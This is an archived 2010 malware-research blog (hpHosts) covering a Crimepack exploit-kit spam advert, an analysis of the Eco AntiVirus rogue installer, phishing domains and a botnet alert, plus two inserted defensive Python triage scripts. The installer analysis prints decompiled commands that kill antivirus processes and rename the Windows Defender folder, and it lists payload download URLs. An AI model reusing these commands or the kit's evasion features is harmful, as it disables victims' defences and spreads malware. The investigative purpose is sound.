Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 28 February 2010

Crimepack for sale: I wanna be a storm trooper! ....

... but I'll settle for having a laugh at a spam that's just come in. Laughing, you ask? Well yes - for starters there's no plain text content, no subject and no HTML content.

It would seem these silly spammers have decided it's best to include the content in the actual headers (likely a bug in their auto-mailer);

Return-Path: root@server.bestindiansexvideos.com
Delivered-To: r00t-y0u_org@it-mate.co.uk
X-FDA: 63288034572.03
X-Panda: scanned!
X-Filterd-Recvd-Size: 3729
Received: from server.bestindiansexvideos.com (unknown [205.234.223.183])
by imf25.hostedemail.com (Postfix) with ESMTP
for ; Sun, 28 Feb 2010 18:44:45 +0000 (UTC)
Received: from root by server.bestindiansexvideos.com with local (Exim 4.69)
(envelope-from )
id 1Nlo89-00035f-E4
for r00t-y0u_org@it-mate.co.uk; Sun, 28 Feb 2010 13:44:41 -0500
To: r00t-y0u_org@it-mate.co.uk
From :CRIMEPACK
Subject: CRiMEPACK EXPLOIT SYSTEM

We are here to introduce to the newest exploit system on the market and a whole new concept for the people:

"highest rates for the lowest price"

We do not focus on having a fancy ajax layout and shitty rates combined with outrageous prices like other packs, we focus on the outcome.

All exploits used are modded to perfection to get the highest rates out of it possible.
And instead of throwing together as many exploits as possible (like other packs out there)
We decided to handpick a few with higher effectiveness

That Includes:

Globals

+ Flash10
+ Adobe Acrobat Reader (<= 9.2)
+ JRE (Many vulnerable)
+ AGGRESSIVE MODE**
Internet Explorer

+ MDAC
+ DSHOW
+ MS09-002

** This is a feature that can be turned on/off from the settings panel
It's a Java applet that will popup asking the user to run the applet, If he approves, exe will load.

Exploit rates on test run (26/2/2010)

Internet Explorer 6 & 7 - 39%
Firefox - 14%
Opera - 6%
Overall Rate: 30%

Rate Countries:

US: 14%
UK: 7%
IN: 38%
DE: 16%
TR: 22%
IT: 18%
AU: 11%

Note that these stats are taken from the test run
The results may increase or decrease depending on quality of traffic

------------------------------------------------------------------------------------------

Features:

1. Undetected from AV Scanners (Javascript & PDF/JAR/JPG files)
2. Random PDF Obfuscation (Not using static pdf file like other packs)
3. Blacklist checker & AutoChecker
4. Prevent Wepawet, Jsunpack and other javascript unpackers to decode your page

Will autocheck (can be turned off) your domain for blacklist & malware lists, and will notify you if found, Checks the following:

+ Norton SafeWeb
+ My WebOfTrust
+ Malc0de
+ Google Safe Browsing
+ Malwaredomainlist
+ Mcafee SiteAdvisor
+ hpHosts
+ Malwareurl



------------------------------------------------------------------------------------------

Current version 2.2.1 prices:

$400 - 1 License

1 License includes:

+ Domain locked one domain (subdomains unlimited)

+ 2 new domain builds if blacklisted

+ Support

+ Minor updates for free

+ Discount on new releases


Extras:

1. Domain re-build for other domain (50$)

*** NOTE: YOU ARE NOT ALLOWED TO RESELL/SHARE, IF WE CATCH YOU DOING THIS YOUR LICENSE WILL BE REVOKED ***

2. AV-Cleaning ($80 first time, $50 after)

If you are interested in promoting/reselling, you will get a good offer

------------------------------------------------------------------------------------------

Contacts:

MSN: crimepack@googlemail.com
ICQ: 631592697

WE ACCEPT PAYMENTS THROUGH WEBMONEY AND LIBERTYRESERVE
Message-Id:
Date: Sun, 28 Feb 2010 13:44:41 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.bestindiansexvideos.com
X-AntiAbuse: Original Domain - it-mate.co.uk
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - server.bestindiansexvideos.com


As you'll notice from the headers, the e-mail originated from 205.234.223.183 (205.234.128.0/17 - AS23352 SERVERCENTRAL Server Central Network). The earliest Received line ("from root ... with local (Exim 4.69)") and the X-AntiAbuse UID/GID of 0 show it was injected by the root account on that box itself rather than relayed through it. The IP is home to;

bestindiansexvideos.com
buycheapmobilecontractphones.com
cheapholidaysflightshotels.co.uk
chinanewsx.com
clothesshop4u.co.uk
contractphoneslive.com
freepornza.com
gmobilephones.co.uk
holika.com
mobilephonedealshub.com
taxizza.com
uknewsx.com
watchindiansexvideos.com
wearelondoners.co.uk


Best I can tell, every single one looks like someone's poor attempt at SEO.
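To do by script what the post does by eye (walk the Received: chain back to the host that injected the mail), here is an added example; it is not code from the post or from hpHosts. Its input is a message reconstructed from the headers quoted above, with the addresses the post elides left elided and the body dropped; the function and field names are my own.

```python
"""Walk a message's Received: chain back to the hop that injected it.

Added example; the sample message is reconstructed from the headers
quoted in the post (elided addresses stay elided, body dropped).
"""
import email
import re
from email.utils import parseaddr, parsedate_to_datetime

# Constructed sample. Folded header lines are continued with a tab.
RAW_MESSAGE = (
    "Return-Path: root@server.bestindiansexvideos.com\n"
    "Delivered-To: r00t-y0u_org@it-mate.co.uk\n"
    "Received: from server.bestindiansexvideos.com (unknown [205.234.223.183])\n"
    "\tby imf25.hostedemail.com (Postfix) with ESMTP\n"
    "\tfor ; Sun, 28 Feb 2010 18:44:45 +0000 (UTC)\n"
    "Received: from root by server.bestindiansexvideos.com with local (Exim 4.69)\n"
    "\t(envelope-from )\n"
    "\tid 1Nlo89-00035f-E4\n"
    "\tfor r00t-y0u_org@it-mate.co.uk; Sun, 28 Feb 2010 13:44:41 -0500\n"
    "To: r00t-y0u_org@it-mate.co.uk\n"
    "Subject: CRiMEPACK EXPLOIT SYSTEM\n"
    "\n"
    "(body omitted)\n"
)

# One Received: header, flattened: "from <helo> (<rdns [ip]>) by <host> ..."
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)"              # name the sending side presented
    r"(?:\s+\((?P<comment>[^)]*)\))?"    # receiver's own "(rdns [ip])" note
    r".*?\bby\s+(?P<by>\S+)",            # host that wrote this header
    re.DOTALL,
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(raw):
    """Return the hops oldest-first. Headers are stored newest-first, so
    the list is reversed; the first entry is where the mail was injected."""
    msg = email.message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        flat = re.sub(r"\s+", " ", value).strip()
        m = HOP_RE.search(flat)
        if not m:
            continue  # not in the from/by shape; skip rather than guess
        ip = IP_RE.search(m.group("comment") or "")
        stamp = flat.rsplit(";", 1)[1].strip() if ";" in flat else ""
        hops.append({
            "helo": m.group("helo"),
            "by": m.group("by"),
            "ip": ip.group(1) if ip else None,
            "local": " with local" in flat,   # Exim: submitted on the box itself
            "time": parsedate_to_datetime(stamp) if stamp else None,
        })
    return hops


def originating_hop(hops):
    """First hop that carries an address literal, i.e. the box that handed
    the message to a server we trust; anything before it is the sender's
    own infrastructure and could be forged."""
    return next((h for h in hops if h["ip"]), None)


def hop_delays(hops):
    """Seconds between consecutive hops. Negative or very large gaps are a
    classic sign of a fabricated Received: line."""
    return [
        int((b["time"] - a["time"]).total_seconds())
        for a, b in zip(hops, hops[1:])
        if a["time"] and b["time"]
    ]


def return_path_matches_origin(raw, hops):
    """Crude consistency check: Return-Path domain vs the HELO name the
    originating hop announced. Here they agree; phish often doesn't."""
    _, addr = parseaddr(email.message_from_string(raw).get("Return-Path", ""))
    domain = addr.rpartition("@")[2].lower()
    origin = originating_hop(hops)
    return bool(domain) and origin is not None and origin["helo"].lower() == domain


if __name__ == "__main__":
    chain = parse_received(RAW_MESSAGE)
    for h in chain:
        print(f"{h['helo']:35} -> {h['by']:32} ip={h['ip']} local={h['local']}")
    print("injected from:", originating_hop(chain)["ip"])
    print("hop delays (s):", hop_delays(chain))
    print("Return-Path matches origin:", return_path_matches_origin(RAW_MESSAGE, chain))
```

On this message the oldest hop is a local Exim submission by root, the next is the first (and only) hop with an address literal, 205.234.223.183, and the two timestamps are four seconds apart, so the chain is internally consistent; the point of the delay and Return-Path checks is that on a forged chain they usually aren't.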



But wait, there's also an advert there for eco-antivirus-2010.com. Wonder what happens if I click that "advert"? Well, the URLs we're taken through are;

http://www.holika.com/c/adclick.php?ad=...;eaddeca30bdba43e2ee3c8b04bcc8a3e
http://www.holika.com/c/adclick.php?ad=...%3Beaddeca30bdba43e2ee3c8b04bcc8a3e&c_result=e4cd7e371cdf54da833ec0ec3cc0521c
http://proprator14.info/087wLyQzL1EzL==
http://scnadator14.info/25/27-087wLyQzL1EzL==


With the payload (Eco_Install.exe, MD5: 3de085a41b50d0c038aa29a5e9888bf2) coming from;

http://prodloader14.info/P42099415AC42B8101BA62/inrtall.aexe?counter=1
http://prodloader14.info/P42099415AC42B8101BA62/inrtall.aexe?counter=2


This malicious goodness is hosted, surprise surprise, by AS32613 IWEB-AS iWeb Technologies Inc. http://www.iweb.com/ (174.142.0.0/16), on 174.142.96.0/24. You'll no doubt recognize some of the other domains listed.

VirusTotal shows 26 vendors detecting this particular variant;

http://www.virustotal.com/analisis/10ab76e229200dd6ce179d9533b07d92be7bd02189e826d57d31315c1321be31-1267388160

The file is an NSIS installer (7-Zip will unpack it), and unpacking it shows several DLL files, one batch file (DD.bat), and of course the installer script itself, [NSIS].nsi.

Eco_Install.exe/
Eco_Install.exe/[NSIS].nsi
Eco_Install.exe/$COMMONSTARTMENU
Eco_Install.exe/$COMMONSTARTMENU/Programs
Eco_Install.exe/$COMMONSTARTMENU/Programs/ Eco AntiVirus
Eco_Install.exe/$EXEDIR
Eco_Install.exe/$EXEDIR/DD.bat
Eco_Install.exe/$EXEDIR/$PLUGINSDIR
Eco_Install.exe/$EXEDIR/$PLUGINSDIR/nsExec.dll
Eco_Install.exe/$EXEDIR/$PLUGINSDIR/NSISdl.dll
Eco_Install.exe/$PLUGINSDIR
Eco_Install.exe/$PLUGINSDIR/someth.dll
Eco_Install.exe/$PLUGINSDIR/UAC.dll


Looking at the NSIS file showed some rather interesting strings, such as the ones below. Note the hostname is split across two variables ("http://ahah3h884.eco-a" and "v.net"), so the full "ahah3h884.eco-av.net" never appears as one contiguous string in the file;

StrCpy $1 "t414q"
StrCpy $[36] "v.net"
StrCpy $[35] "http://ahah3h884.eco-a"
StrCpy $[34] "http://ahah3h884.eco-a"


If we load ahah3h884.eco-av.net (also hosted at 174.142.96.2), we're automagically 302'd to macacafe.com (69.64.155.126, AS21740 DemandMedia AS DemandMedia);

HTTP/1.0 302 Found
Expires: 0
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
X-Powered-By: PHP/5.2.6-1+lenny3
Location: http://macacafe.com
Content-type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sun, 28 Feb 2010 20:20:55 GMT
Server: lighttpd/1.4.23


Rather surprising given this domain isn't live - it's parked (though given this behaviour is seen when loading several other mysterious sub-domains associated with Eco AntiVirus/Green AntiVirus, it wouldn't surprise me if this was deliberate).

Looking further down the NSIS file, we also see it attempts to kill the processes of various security programs, including NOD32, Windows Defender and McAfee (taskkill run through the nsExec plugin, each block guarded by an IfFileExists check for the product's directory), and finishes by renaming the Windows Defender directory out of the way;

IfFileExists $SHELL[17]\Windows Defender\*.* 0 392
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\McAfee\*.* 0 398
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im mcregist.exe /im wmiprvse.exe /im mcsysmon.exe /im Mcshield.exe /im McNASvc.exe /im MpfSrv.exe /im McSACore.exe /im mcagent.exe /im msksrver.exe /im MpfSrv.exe /im mcmscsvc.exe /im McProxy.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Eset\*.* 0 404
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im nod32krn.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Windows Defender\*.* 0 411
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
Rename $SHELL[17]\Windows Defender\*.* $SHELL[17]\dm\*.* 0


I'm planning on running the installer later (assuming it'll run on my Windows 2000 test machine (64MB RAM, so probably not)), as there are also references to additional files being downloaded, but because the NSIS file contains a ton of "Invalid" lines, I suspect either the installer I've got is corrupted, or I've missed a string somewhere (Anubis reports the same thing, as does CWSandbox, though its report shows the URLs returning a 404). I'll report back on that once I'm done.
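Pulling those indicators out of the decompiled script by hand is tedious, so as an added example (not the post's own code) the following extracts the string constants, rebuilds the split hostname and lists the per-product kill lists and renames from a decompiled [NSIS].nsi. The sample is trimmed from the lines quoted above; the way the two URL fragments are joined is a heuristic of mine, since the concatenation step itself isn't among the quoted lines.

```python
"""Triage a decompiled NSIS script: string constants, split URLs, and the
AV processes it tries to kill.

Added example; NSI_SAMPLE is trimmed from the decompiled [NSIS].nsi lines
quoted in the post. The fragment-joining is my own heuristic, since the
concatenation step is not among the quoted lines.
"""
import re

NSI_SAMPLE = r"""
StrCpy $1 "t414q"
StrCpy $[36] "v.net"
StrCpy $[35] "http://ahah3h884.eco-a"
StrCpy $[34] "http://ahah3h884.eco-a"
IfFileExists $SHELL[17]\Windows Defender\*.* 0 392
Call 457
File $PLUGINSDIR\nsExec.dll
SetFlag 13 0
Push taskkill /f /im MSASCui.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\McAfee\*.* 0 398
Call 457
Push taskkill /f /im mcregist.exe /im wmiprvse.exe /im mcsysmon.exe /im Mcshield.exe /im McNASvc.exe /im MpfSrv.exe /im McSACore.exe /im mcagent.exe /im msksrver.exe /im MpfSrv.exe /im mcmscsvc.exe /im McProxy.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
IfFileExists $SHELL[17]\Eset\*.* 0 404
Push taskkill /f /im nod32krn.exe
RegisterDLL $PLUGINSDIR\nsExec.dll Exec 0
Rename $SHELL[17]\Windows Defender\*.* $SHELL[17]\dm\*.* 0
"""

STRCPY_RE = re.compile(r'^StrCpy\s+(?P<var>\$\S+)\s+"(?P<val>[^"]*)"')
GUARD_RE = re.compile(r"^IfFileExists\s+(?P<path>.+?)\\\*\.\*\s+\d+\s+\d+\s*$")
RENAME_RE = re.compile(r"^Rename\s+(?P<src>.+?\\\*\.\*)\s+(?P<dst>.+?\\\*\.\*)\s+\d+\s*$")
# "scheme://host" whose host ends in a dotted alphabetic label: a whole URL
URL_WHOLE_RE = re.compile(r"^https?://[^/\s]*\.[a-z]{2,}(?:/|$)")


def string_constants(text):
    """Every StrCpy $var "literal" assignment, in order of appearance."""
    out = {}
    for line in text.splitlines():
        m = STRCPY_RE.match(line)
        if m:
            out[m.group("var")] = m.group("val")
    return out


def reassemble_urls(consts):
    """Heuristic: a literal that starts with http:// but whose host has no
    complete top-level label is a split URL; try every other non-URL literal
    as its tail and keep the joins that produce a plausible host."""
    values = list(consts.values())
    heads = [v for v in values if v.startswith("http") and not URL_WHOLE_RE.match(v)]
    tails = [v for v in values if not v.startswith("http")]
    return sorted({h + t for h in heads for t in tails if URL_WHOLE_RE.match(h + t)})


def kill_lists(text):
    """Map each IfFileExists guard (the product directory it probes for) to
    the image names passed to 'taskkill /im' under that guard, de-duplicated."""
    kills, product = {}, "(unguarded)"
    for line in text.splitlines():
        g = GUARD_RE.match(line)
        if g:
            product = g.group("path").rsplit("\\", 1)[-1]
            continue
        if line.startswith("Push taskkill"):
            bucket = kills.setdefault(product, [])
            for name in re.findall(r"/im\s+(\S+)", line):
                if name not in bucket:
                    bucket.append(name)
    return kills


def renames(text):
    """Directory renames: here the Windows Defender folder is moved aside."""
    return [(m.group("src"), m.group("dst"))
            for m in map(RENAME_RE.match, text.splitlines()) if m]


if __name__ == "__main__":
    consts = string_constants(NSI_SAMPLE)
    print("strings:", consts)
    print("rebuilt URLs:", reassemble_urls(consts))
    for product, names in kill_lists(NSI_SAMPLE).items():
        print(f"{product}: taskkill {' '.join(names)}")
    print("renames:", renames(NSI_SAMPLE))
```

Two things the output makes obvious that the raw listing doesn't: the McAfee list contains MpfSrv.exe twice (a sign the list was pasted together from somewhere else), and it includes wmiprvse.exe, which is Windows' own WMI provider host and not a McAfee binary, so the installer kills a system process along the way.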

Malwarebytes AntiMalware users will be pleased to know this is already detected as Rogue.EcoAntiVirus.

Full Circle Magazine: Issue 34

In the magazine:

- Command and Conquer.
- How-To : Program in Python – Part 8, Digitally Retouching a Photo in GIMP, and The Perfect Server – Part 4.
- My Story – a Linux User, and Powerpets.
- Review – Acer UL30-A laptop.
- MOTU Interview – Roderick Greening.
- Top 5 – Reference Tools.
- Ubuntu Women, Ubuntu Games, My Opinion, and all the usual goodness!

Read more
http://fullcirclemagazine.org/2010/02/27/issue-34-is-on-the-horizon/

Get it while it's hot!
http://fullcirclemagazine.org/issue-34/

Issues 0 - Current
http://fullcirclemagazine.org/downloads/

Forums:
http://ubuntuforums.org/forumdisplay.php?f=270

Wiki:
http://wiki.ubuntu.com/UbuntuMagazine

Friday, 26 February 2010

Sun Network: MSN/AIM/Gtalk/Yahoo phishing - again

It would seem, dear readers, that the folks at Sun Network have decided booting our friendly phishers isn't a good idea after all, as they're now back yet again, spamming via MSN and whatnot, with links that lead to phishing scams such as the one in the screenshot to the left, which steal your MSN, Yahoo, AIM and GTalk credentials.

Once stolen, you're then once again redirected to ishowclips.com. Sites I've currently identified are;

cant-stop-laughin-hehe.com
com.crazily-laughed-on-u.com
crazily-laughed-on-u.com
forbidden-pics-of-you.com
omg-funny-i-gotcha.com
our-truth-is-here-hehe.com
smiles-on-your-faces.com
super-liars-are-crazy.com
www.cant-stop-laughin-hehe.com
www.crazily-laughed-on-u.com
www.forbidden-pics-of-you.com
www.omg-funny-i-gotcha.com
www.our-truth-is-here-hehe.com
www.smiles-on-your-faces.com
www.super-liars-are-crazy.com
www.your-damn-secrets-revealed.com
your-damn-secrets-revealed.com


The above are presently at 121.54.171.30 and 121.54.171.44, but the entire /24 has seen its share of phishing and malware, and on that, I'd suggest blackholing them; it seems they aren't going to learn.

Thursday, 25 February 2010

Alert: tracox.pwnz.org, r30686.ovh.net

I was notified earlier about tracox.pwnz.org, which has been reported as a botnet C&C for the Spybot.AVEO infection (Trend Micro has it pegged as WORM_IRCBOT.ABJ). After reading up on this, I'd strongly urge everyone to blackhole it asap.

Trend Micro's writeup also has a reference to its contacting r30686.ovh.net (yep, OVH again) which resides at 87.98.173.190, so I'd suggest blackholing that one too. This IP houses;

irc.camelug.it
poker-974.com
r30686.ovh.net
tracox.pwnz.org


Not only does this worm steal gaming related details from the infected computer, it also monitors for specific sites such as banks, PayPal, RapidShare etc, and attempts to spread across network shares.

You can read the full details on this one at;

http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=WORM_IRCBOT.ABJ
http://en.securitylab.ru/viruses/391068.php

Finland's CERT also has a writeup (translated) referencing the OVH IP as being part of the "Chuck Norris" infection;

http://www.cert.fi/tietoturvanyt/2010/02/ttn201002231554.html

Incidentally, if anyone has a sample of this, please drop me an e-mail.

Wednesday, 24 February 2010

Micro Chip Computers: A lesson in losing customers

I had an interesting conversation this morning with one of my local PC stores. First a back story ....

Around Feb 4th, I bought a second hand hard drive for one of the servers (as it was only £20 (160GB HDD) I thought what the heck). I didn't get round to checking it until last week, and surprisingly, upon booting the drive, I noticed the previous customer's Windows installation was still present - but it then got a whole lot worse - the customer's personal files, inclusive not only of 60GB of music, but his CV, financial data (as far as I could tell), and a whole host of other identity theft friendly stuffage, were still on the drive.

Needless to say, my first thought was to contact the customer to inform them of my finding. The customer was obviously quite shocked, and very annoyed at the shop. I advised him I'd get an image of the drive and pop it over to him.

Sadly, when I went to get the image the next day, the drive refused to power up - it was dead - completely. I returned it to the shop, and advised them not only of the drive being dead, but of their customer's data still being on the drive. The bloke in the shop advised me it wasn't his customer's drive (it was, and his customer confirmed it was), but was a "test drive", and it wasn't his customer's Windows installation/personal files, but merely a backup of such (errr nope, it wasn't). Asking for my money back, I was told he'd have to send it away as it was a NEW DRIVE (it wasn't), and worked when he'd sold me it (at least he was partially right).

Calling back this morning, I was told in no uncertain terms;

"You can have your money back or you can have another drive, but we never want you in our shop again as it was a very sly thing you pulled"

Asking what he meant by "very sly thing", I was told he was referring to my contacting his customer. So hang on, the shop breaches the Data Protection Act (at the very least), and I'm the one in the wrong??? I think not. As far as I'm concerned, it wasn't sly at all. The customer's data was still on the drive and they had a right to know (I'm familiar with the shop and am in no doubt that if I'd not called the customer myself, they'd have brushed it under the carpet).

Alas, whilst I've now got my money back, I'm now barred from Micro Chip Computers in Whitley Bay - for doing the right thing .... (had I been someone with malicious intent, the shop's customer could've been in for a whole heap of issues; whilst I didn't expect a thank you from the shop, being barred is the last thing I expected - no loss though, I usually use my friend's company for all of my hardware needs).

Wednesday, 17 February 2010

IAC/MindSpark: Scamming with a twist

It would seem folks, IAC/MindSpark aren't happy with their current methods of attracting new victims, err, users. Now they've decided to go with a scamming approach.

What does this entail you ask? Well, look at the screenshot to your left - there are two adverts there. One asks which is a better presenter, offers a "free" (sic) $500 Visa gift card, and claims to be leading you to myrewardsvault.com (FYI, myrewardsvault.com is also a phishing scam, though separate to this particular case) - in actuality however, the path (note, other sites are loaded via webfetti.com itself) you're taken through is;

gnspf.com/click/?s=12064&c=209703
fbgdc.com/click/?s=12064&c=209703&internal=P_i6q4m_1
webfetti.com/dl/index.jhtml?partner=ZKxdm194&spu=true&sub_id=31826&spu=true&nbCode=OjI6R0I6SERZbHM1MjEtOjMxODI2OjEyMDY0OnJlZGlyZWN0X2Zyb21fNjQ3MV90b18xNDQ0

Headers:

GET /click/?s=12064&c=209703 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: gnspf.com
Cookie: BIGipServertracking-pool=16912556.20480.0000

HTTP/1.1 302 Found
Date: Thu, 18 Feb 2010 06:23:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:24:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Location: http://fbgdc.com/click/?s=12064&c=209703&internal=P_i6q4m_1
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

------------------------------------------------------------------
GET /click/?s=12064&c=209703&internal=P_i6q4m_1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: 1444=KpIYL2uZmgg4yIJzEYBGyQ%3D%3D%7CqjyUwp8DXB9V1V5TMGJkPSlTNVlAjeL74g6%2BPMEneNa4Z6RpC7zW9QFEWUcve0Yl%2B8oqlmF7zn90JSJZeTfITzv7oMCc0nToxsi1O19dKCB9lyanI4LgY73jrpHvpQ0kQqDBK8kdQVOy5%2FD1Aa%2B4X77aKrtx%2BEsk%2FzjS9rGchGL2u5drA7pq17NXA6MD2vrUlUCnEkGTUu2kWVNhvIATkCfIcHnPhfZGNLvmuKC5YRHqtTytab3RN9175GmloAb8AFIUKNIRfly%2FAbFbgowvkqvrAb3fTnaIfR3xIjng4JNs%2BVcyNo8r1fRoueThopUnE9tptsH80njl2oVhkHEEVdq%2FiY92tU4JVdxBe19osUel%2BbMWt9zUfrjnqmESICOaTT8S2liDyEL9SgAH8gqFgptKLC9ALKdHG%2F773bXPz3SvNFWrTDa9oerKJUy97AS4JBoBUsOU4%2FBsBm2pCQFV4ofrFt1lRukrYIRjuRLvgR%2B9oR04tutzZPEnbXOyM%2BVPv%2BEXbB8Vz7GJO2dnBBmas%2FtAdgDeog3lsf8qpHeUcMIldPB2Sc%2BZl%2FNRReOYYmfgvrCEoxUgOiiWXH3aQDfexZk%2BQMoI%2F940Fv8a968F7h8RD%2FIYHNAx3yQo7DR%2BnOFmEhHNdM6Dgq5mt6RbXR7G2F1xTnhcVu77FHRyzVWn%2Fx77bI7QGb0UtEJuWrLavrkMo5ONcGvMFFpZSdrStN1fCDy5GwnddxVd3l9qm2GlOpqoOGp6yWrqS%2Fad9VLSz3YML1%2BSadvEtjwilzHnhXzWQ6H31ThqsAgaRa1diaQtRAhhWRnxBGd222pTYZUYE2I4Q7sbrY5sTWz7ucyxh3LFsn64R%2FfZYI8H4f%2BsRjyiJbGUoUay6fdFJ4OFLP%2BB2b20jkGrNXfylMsUlp1LNS%2FCkLPQNwlv8BRvC8r%2F2Xh6QfPDmDVx%2FUFjCRHd6o0fdtXk%2FyVxoloxn8HZseQR%2BxW6HTCLjb%2FKBv19l5PVzzHirZs%3D; 1444-encoded_click=HDYls521-; 1444-affiliate_id=31826; 1444-site_id=12064; 1444-subid=redirect_from_6471_to_1444; 1444-2378=Z2z2asUNHzcxmaw0ynMegA%3D%3D%7CtshesoOPB3UHr%2BS5ChA2621ZRA%2BEw7AjRSgorteE%2FNK74nW4d5q2AM3SvYf3LMXaR1tcZOCMrxz75lPhulFluQ%3D%3D; 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5449=adY0WdbTzSZpTEq2L14taA%3D%3D%7C1FD22QIwSrWIFxhAWIEAYJch1LzDpGS%2FN56KiBBRgVX5PDckVK%2BHhiJQ8W9RB%2F5VkVv8a9P%2BiLKZJ00YJnsSjg%3D%3D; 1444-5449-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5450=jby15tERjZmHHorIXxobBg%3D%3D%7C3v9J3o%2BGdmKze3u3l9LRIh2ZMesmz4gyr5awW8S4PgR2cjMER8wIdTUARlQx9y66s2SwZEdkVnxnd1gknvXExQ%3D%3D; 1444-5450-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5451=SpssNVCIGQvBeLWjaSD1LQ%3D%3D%7Cd77q%2BNbs2SBTucOnkYKGxQmrHK2HdA7KOSPm3trhLmiBdzDXu6kD7s2UGdThXHDgh2CWDak1jK7YDo%2FYwaSVQA%3D%3D; 
1444-5451-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5481=yCI7pWNRV5Yt1Fg2omnf8A%3D%3D%7Ct0AwAP%2BrcZaIyyfYz3rY%2Fd0H5mkrfJAjuO2%2B14J8pAIqJUDIpCT302wCUwDjZzOh9QxHfdbC9ZWsk6LfBs6nMw%3D%3D; 1444-5481-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5482=ojzalu2fMmT3w43Ko7sLbg%3D%3D%7COXlb8JTzkyeFA6HXqkSmI73OLuahw6i4pOUut1wALR7cdRNDxN4tnYjzT47VQkjoBEmi5yLb7y5S%2Bh%2FPFUoYeg%3D%3D; 1444-5482-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-5483=zpADcNHI2qtsUc2Wt%2Bk%2Fyg%3D%3D%7C%2BoxJht7mTbd9SBe3nR2HgwoPjEmcrCuk71vxiD29hEk181JnpnE4L5HE0U%2BfZddYK0veY8OGAvOxtPF3Q9hb1A%3D%3D; 1444-5483-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-6255=29juYjYW1tYJ5pQsG%2BtgXw%3D%3D%7CF9l1X2oEiBLrsUL14jAMzwuLXeRgfNrxsQDtQHShQbdvYeV2nskixZJKrsQdYuXfFn3xz0OMWbPA4OPbXgOeYQ%3D%3D; 1444-6255-converting=317a05143c8f1656b95559c0f339974892f4cd69; 1444-7742=KQEq%2BhO02iXamXej3Pd6XA%3D%3D%7C0t9QWq%2B0JFJ0VV3ZKYtZ64b%2F%2BUPBugH0gKSw%2BgglT%2BeSx26WuP2zrYkokX4QkLC3x%2Bj5%2BkspwJQB5eM2caqKjw%3D%3D; 1444-7742-converting=317a05143c8f1656b95559c0f339974892f4cd69; BIGipServertracking-pool=16978092.20480.0000
Host: fbgdc.com

HTTP/1.1 200 OK
Date: Thu, 18 Feb 2010 06:24:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 18 Feb 2010 06:24:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DEVa TAIa OUR BUS"
Set-Cookie: 1444-2378=YdptRXGxNQG5IohFGonDgQ%3D%3D%7CJE3gg24QTSzyuX22CcyLBjJTH%2FFW4bJS4swvdXvptwYz4QRk1mrQNIXg1F6oI1t8xItVV%2FsQjq2XbSMPTLXpKw%3D%3D; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
Set-Cookie: 1444-2378-converting=317a05143c8f1656b95559c0f339974892f4cd69; expires=Thu, 18-Mar-2010 06:24:04 GMT; path=/
